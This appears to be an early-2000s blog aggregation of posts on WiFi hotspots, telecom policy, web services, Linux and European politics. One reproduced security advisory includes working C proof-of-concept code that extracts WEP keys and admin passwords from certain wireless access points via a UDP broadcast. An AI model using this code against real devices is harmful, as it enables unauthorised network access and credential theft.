Megabeam rolls out Euro WLAN network : Megabeam, the pan-European wireless Internet service provider, has set the pricing for its WLAN hotspot service for the first time. Subscriptions bought directly will start at %u20AC7.5 for two hours' access. Twenty-four hour access will cost %u20AC 30 (approx. £19). As you can see from the pricing, Megabeam is targeting the business traveller only.

How sad. Another company targeting the business traveller with perceived deep pockets in order to fleece the early adopters and thereby pay for the capital costs. I know this makes business sense but where is the cheap skate WISP that charges little or nothing? Surprise! They're only a short walk to the next block. [from: JB Wifi]

Wired News has a story about the guy who mapped WiFi for the whole of Manhatten (previously blogged here) N.Y., N.Y., It's a Wireless Town [from: JB Wifi]

Dan Gillmor: Telecom strategy is take it or leave it Gillmor is talking about the USA, but his conclusions are applicable to Europe as well. He reasons that the solution to the price, slow rollout and monopoly control of broadband is first legislation to encourage public and private alternatives for the last mile problem and second to encourage Open Spectrum policies for Wireless. The second is particularly interesting. The success of WiFi is showing that particularly at high frequencies we can have an ordered exploitation of wireless spectrum without regulatory control over the allocation to providers and users. Technology is proving that spectrum doesn't have to be a scarce resource that must be carefully husbanded and so sold to the highest bidder. But I'm still not sure that it's an answer to Broadband provision at least in the short term. We don't yet have any good examples of WISPs (Wireless ISPs) being profitable or even reasonably successful. And all the current models still have high capital startup costs.

So to go back to the first point about public and private last mile investment. I find it ironic that the government of the day that first encouraged cable in te UK tried long and hard to get the cable companies to lay star-wired fibre. Sadly, this was too early in the Moore's law cycle and so prohibitively expensive at that time. But at least they did lay pipes in the road that would let them lay new wires relatively easily. Maybe we should be encouraging the cable companies to go back and offer a very high speed service as an alternative but with their current debt situation I can't see this happening. [from: JB Wifi]

Something truly wonderful about this story.

Who will buy my personal data? Josh's friend Chris got hold of his marketing data under the Data Protection Act. Now he's selling it to the highest bidder on e-bay.

Lloyds TSB: Approximately 500 pages of personal data including an analysis of banking products they believe I might be interested in. Also includes overdraft limit maintenance history (hand written), risk management history data (93 pages) and a full list of letters sent over the previous 5 years (completed by hand). All data and codes come with explanatory notes provided by Lloyds TSB. Original cost UKP 10. Sainsbury's: Dated 12 July 2001, this data is split into five separate reports. Report 1. Operational report (name and address etc.) Report 2. Operational report again, with summarised details and the last 31 transactions on the card. Report 3. Drawn from the main data repository and includes the 'Acorn' standard marketing categorisation. Includes the assumption that we are 'better-off inner-city executives living in a partially gentrified multi-ethnic area'. Report 4. Shows the transactions made using our reward card. Report 5. This is a list of EVERYTHING we bought from Sainsbury's over a 3 year period - where we bought it and how much we paid. This data has been co-produced with my partner whose individual data has been removed.

[thanks, Oblomovka] [from: JB Ecademy]

Ecademy Launches WiFi Special Interest Group.

There'll be a more formal launch tonight, but the WiFi Special Interest Group is now live. This is a complete website in the style of the main Ecademy site which shares membership with the main site (and other SIGs). The focus is on WiFi and related wireless Internet access technologies such as GPRS, 3G, Bluetooth and such like.

As a member of Ecademy and like non-members you are automatically able to view the content. If you wish to post content, vote in polls and otherwise contribute you need to join the SIG. This is a one-click process. You'll see a link to Join in your menu on the left.

The SIG has been initially populated with blog and article entries from the main site that appear to be relevant. If you were the original author you may notice that these have disappeared from your blog on the main site and appeared in your blog on the WiFi site. You have automatically been given membership of the WiFi SIG.

Over the coming months we expect to launch a group of these SIGs on various topics. [from: JB Ecademy]

KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------

Title
-----
Accesspoints disclose wep keys, password and mac filter

Date
----
2002-11-01


Description:
------------

GlobalSunTech develops Wireless Access Points for OEM customers like Linksys, D-
Link and others. Capturing the traffic of a WISECOM GL2422AP-0T during the setup
phase showed a security problem.

Sending a broadcast packet to UDP port 27155 containing the string "gstsearch"
causes the accesspoint to return wep keys, mac filter and admin password. This
happens on the WLAN Side and on the LAN Side.


Systems Affected
----------------
Vulnerable, tested, OEM Version from GlobalSunTech:
WISECOM GL2422AP-0T

Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
D-Link DWL-900AP+ B1 version 2.1 and 2.2
ALLOY GL-2422AP-S
EUSSO GL2422-AP
LINKSYS WAP11-V2.2


Proof of concept:
-----------------

#include
#include
#include
#include
#include

typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;

int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);

sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd < 0)
perror("socket");

val = 1;
ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val,
sizeof(val));
if (ret < 0)
{
perror("setsockopt");
exit(1);
}

ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct
sockaddr));
if (ret < 0)
{
perror("sendto");
exit(1);
}

ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));

printf("Type : %sn",ans->type);
printf("Announced Name : %sn",ans->name);
printf("Admin Username : %sn",ans->user);
printf("Admin Password : %sn",ans->pass);

return 0;
}

Disclaimer
-----------

This advisory does not claim to be complete or to be usable for
any purpose. Especially information on the vulnerable systems may
be inaccurate or wrong. Possibly supplied exploit code is not to
be used for malicious purposes, but for educational purposes only.
This advisory is free for open distribution in unmodified form.

http://www.khamsin.ch
[from: JB Wifi]

Another security alert. Oh, the joys of embedded code.

---

Popular Linksys Router Vulnerable to Attack

A denial-of-service vulnerability in one of the most popular cable and DSL routers
allows an attacker to crash the router from a remote location.

The Linksys Group Inc.'s BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch is
vulnerable to a remote DoS attack that requires the attacker to do nothing more
than access a specific script on the router's remote management interface. The
vulnerability affects all of the routers with firmware versions earlier than
1.42.7.

http://eletters1.ziffdavis.com/cgi-bin10/flo?y=eSkd0EXgz40DUm0ry20Ac [from: JB Wifi]

Slashdot | Building A Community Wireless Network From Scratch unusually good comments from slashdot. The main article can be found here about community wireless in Bristol. More comment later. [from: JB Wifi]

Dan Gillmor: Telecom strategy is take it or leave it Gillmor is talking about the USA, but his conclusions are applicable to Europe as well. He reasons that the solution to the price, slow rollout and monopoly control of broadband is first legislation to encourage public and private alternatives for the last mile problem and second to encourage Open Spectrum policies for Wireless. The second is particularly interesting. The success of WiFi is showing that particularly at high frequencies we can have an ordered exploitation of wireless spectrum without regulatory control over the allocation to providers and users. Technology is proving that spectrum doesn't have to be a scarce resource that must be carefully husbanded and so sold to the highest bidder. But I'm still not sure that it's an answer to Broadband provision at least in the short term. We don't yet have any good examples of WISPs (Wireless ISPs) being profitable or even reasonably successful. And all the current models still have high capital startup costs.

So to go back to the first point about public and private last mile investment. I find it ironic that the government of the day that first encouraged cable in te UK tried long and hard to get the cable companies to lay star-wired fibre. Sadly, this was too early in the Moore's law cycle and so prohibitively expensive at that time. But at least they did lay pipes in the road that would let them lay new wires relatively easily. Maybe we should be encouraging the cable companies to go back and offer a very high speed service as an alternative but with their current debt situation I can't see this happening. [from: JB Ecademy]

eWEEK - Print Article : Microsoft's Fitzgerald: Web Services Over the Hump Fitzgerald argues that the base Web Services protocols are now done and that the toolkits are in place to use them, so it's time to move into an implementation stage rather than sit there arguing about the protocols and approach. Something I wholeheartedly agree with.

Then he moves on to comparing the .NET environment with the Java environment. We get this which again is probably true. "So we continue to focus on high-volume, low-cost, mass-market, ride-the-high-volume hardware. Gartner [Inc.] did a piece this year where they said 80 percent of the spending on Java application servers has been wasted—where people are just over-buying functionality that they don't need. The current environment, where budgets are tight and people are trying to do more with less, is really forcing people to rethink writing a big check for infrastructure." And at this point I begin to wonder exactly what Java is good for. It's making serious inroads into the embedded processor market such as cellphones, but in the server development market it doesn't feel like it's proved it's point. There was a recent article about a speed comparison between Sun's reference application (The petshop store) in Java and an equivalent using other databases and platforms. One piece missing was a fully open source solution using something like Perl or Python with MySQL. I can't prove it by I have this sneeking suspicion that it would have beaten the pants off all of them.

The thing I find delightfully subversive about Web Services is that the core protocols are implemented in every language you can imagine. If you want to mix .Net, Java, Weblogic, Websphere development and applications into a loosely coupled whole, you can. And if you want to bolt in systems based on Perl SOAP::Lite, Python, Apache Axis, PHP, you can do that too. And the same goes for C++, and Delphi. [from: JB Ecademy]

IM compatibility closer to reality - Tech News - CNET.com : The Internet Engineering Task Force (IETF), the group that sets the technical standards for the Internet, gave the go-ahead to the creators of open-source instant-messaging application Jabber to create a working group based on that technology. This will be known as Extensible Messaging and Presence Protocol (XMPP). So this joins the IBM-Microsoft promoted SIMPLE. The IETF approved SIMPLE as a proposed standard in September. Then we have AOL announcing that AIM and ICQ will interoperate. The fragmented IM market is coming together slowly, but there's still plenty of room for consolidation and interworking. [from: JB Ecademy]

For those of us who spent our youth listening to Dub Reggae, here's the >>INFINITE WHEEL<< Dub Selecta!

An amazing piece of scholarship pulling together a large number of independent surveys of the computer software market. Why Open Source Software / Free Software (OSS/FS)? Look at the Numbers! If you're trying to convince your boss to go with OSS/FS software, this would be a good report to wave at her. [from: JB Ecademy]

This story's actually about WPA but included are some stats from Gartner. ElectricNews.net:News:Wi-Fi Alliance toughens 802.11 security : According to research body Gartner Dataquest, worldwide wireless LAN shipments should increase by 73 percent in 2002, while revenue will increase 26 percent. Gartner predicts that by 2003, WLAN shipments will total 26.5 million units, up from 15.5 million units in 2002, while revenue will reach almost USD2.8 billion in 2003, compared to USD2.1 billion in 2002. Gartner analysts say the market will continue to experience healthy growth through to 2007.

So in very broad terms we have exponential growth in shipments, linear growth in revenue and falling profits. What seems to be happening is that falling prices due to competition is happening earlier and earlier in the price curve and before the early adopters have paid off all the capital costs with the initial high prices. This is a new form of economics isn't it?

I think I've seen some other figures that suggest that Wireless ethernet shipments are now 30% of all ethernet shipments but I can't confirm that. [from: JB Wifi]

WLAN Hot Spot Access For 3G Ericsson announces strategic partnerships to speed up market take-off for public WLAN. Ericsson chooses Agere and Proxim to jointly develop and supply telecom operators with complete end-to-end solutions for WLAN (Wi-Fi) access, integrating hot spot access with mobile 2G and 3G networks. [thanks, CYBERFROST.net]

On the surface this looks like a great idea. But for it to work, we'll need mass shipments of client hardware that supports it. Imagine a new PCMCIA card that does 802.11a+b as well as GSM and/or CDMA with identification and authentication via a standard cellphone SIM. We'd then be able to fire up the laptop and get access anywhere with the software and card choosing the highest speed available. It ought to be possible to choose an appropriate voice channel as well, VoIP if it's available, dropping back to cell if not. But like I said, to do this, we have to have a high installed base of these cards and we also have to have the same sort of roaming and cross charging arrangements that we currently have with cellphone operators. Meanwhile the WLAN industry is churning out  .11b and now .11a cards without all this. The operators won't have the same stranglehold over the technology that they enjoyed with cellphones during the 90s.   [from: JB Wifi]

Here's a map of the 12,647 access points in Manhatten compiled by wardriving every street. Note that this includes private, secured, private unsecured, commercial open and public open points. It was compiled by the Public Internet Project [from: JB Wifi]

I bet you didn't know that Microsoft makes Weblog Software! [from: JB Ecademy]

Two articles that have made me think this week. The first was Anatole Kaletsky in The Times. He was writing about democracy in the higher parts of the EU and comparing it with the USA. The EU is an extraordinary achievement in it's first 46 years but we have ended up with a situation where it is ultimately governed by an unnaccountable and unelected group of politicians each of which can go back to their populace and say "It's not my fault, it's all the others". This raises the question of where we can find the EU equivalent of the US Constitution and it's checks and balances. There's a huge difference here that the founding fathers were a bunch of revolutionaries who were trying to build something in stark contrast to the oppression they perceived of the previous system. The resulting constitution is a succinct model of clarity with a clear vision of a democratic future even if some of it has been whittled away by 200 years of case law and political double dealing. The EU though has been built by politicians with a vested interest in maintaining the status quo and increasing their own power. And we've allowed them to do it, because we (the populace) were largely uninterested in what they were doing.

The second piece was Simon Jenkins bemoaning the strait jacket that central government (and specifically) Prescott puts on regional government and particularly local City government in the UK. Most countries in Europe (and the USA) have found some balance whereby City level groupings can enjoy significant self government. The net result is places such as Barcelona re-inventing themselves as vibrant and forward looking places, while equivalents in the UK such as Manchester or Newcastle ultimately fail to move forward. That's a simplistic view that ignores the great strides that these places have made in small areas. But there seems no doubt that the obession with central control and ring fencing of finances is holding back our second cities.

Which all re-inforces a political belief that I've had for some time. Increasingly I think we have to find ways of governing at an appropriate level. That means making the big decisions at the big level but allowing room for the local decisions to be made at the local level. Which then means having the structures in place for EU, Country, Region, County/State, City, Town/Street. If we can achieve this, it will have a side effect on people's sense of belonging. And they may well have more sense of belonging to the smaller levels than to their Country. In real terms this might mean, say the Welsh thinking of themselves as Welsh, European and only third, British. [from: JB Ecademy]

Interesting short article from Doc Searls What I Learned on Linux Lunacy. Among other things, Doc is a journalist for Linux Today so he's not exactly a disinterested observer. The report is about a cruise of the Caribbean for the alpha geeks of the Linux community.

What caught my eye was this piece. "I'll confess to something here: for the last year or more, I've been a bit worried that Linux' quiet success threatened to make its story less interesting. Now I'm convinced there's a new story in the works--a much bigger one, at least for those of us called "suits" (like, say, the IBM guy). It's about the end of the software business as we know it, and the beginning of whatever replaces it.

The business we knew wanted software to be expensive, high margin stuff. It wanted to lock customers into dependencies. And it wanted to hold on to its position as the paradigmatic hot business category, the kind of business high-rolling investors would help drive to huge successes in the stock market.

That's over, and it's not because a pile of overfunded dot-com fantasies crashed to the ground. It's over because the market doesn't want it any more. The market wants something more like professional services--architects, designers and builders. Good businesses all, but not the kind that are "venture scale", as they say.

The market wants generic $200 workstations that run generic operating systems and generic productivity applications. They don't want to pay more for the applications than they do for the workstations. In fact, they don't want to pay for anything other than expertise. And they don't want that expertise tied up in stuff that nobody else is in a position to understand."

Now I made a fair bit of money in the early 90s running a software company so I'm quite sad to see this if it's true. And it's an issue I've thought long and hard about since then as I tried to work out how to repeat it. I have to say I think I agree with him. Linux in particular seems to me to be the TCP/IP of operating systems (in the same sense that Football is the TCP/IP of team sports). The entry price is low, it's "good enough", it has relatively low hardware requirements and almost surprisingly there seems to be no limit on it's scalability at the top end. As Linux spreads outwards displacing proprietary OS at the top, other Unix in the middle and Microsoft / Apple at the low end, you have to wonder where it will end. Will we be looking back in 10 years time complaining that despite the fact that Linux is ubiquitous and gets the job done, it's still rubbish and limiting where we go next? [from: JB Ecademy]

New Wi-Fi security would do little for public 'hot spots' Improved Wi-Fi security will do little to protect users of public access WLAN hot spots. Analysts recommend an extra VPN layer and personal firewalls. [thanks, Computerworld Mobile/Wireless News] It's good to see that the analysts and journalists are beginning to recognise some of the issues involved in using a public hotspot. You should:-
- Use a firewall like zonealarm
- Use a VPN to any private corporate systems
- Use SSL and authentication for collecting and sending email
That last one is quite problematic. Many people use their ISPs mailbox and SMTP server to deal with email but very very few ISPs support SSL and smtp auth. This has to change.

Meanwhile the proposal for a replacement for WEP is a real problem for the industry. WEP is broken, but it's also hardwired into all the hardware. Any short term changes have to work with existing systems with minimal updates. It looks like WPA may do the trick, but it still requires peer review. Until we have proper military grade encryption commonly available and implemented in a high proportion of hardware, I'd recommend leaving WEP off and using end to end encryption such as SSL which we do understand. Basically regard anything that goes over the WLAN as insecure. From that point of view WEP is a distraction and gives a false sense of security. Which brings us back to the start of this entry and the importance of securing your PC and securing the important applications. [from: JB Wifi]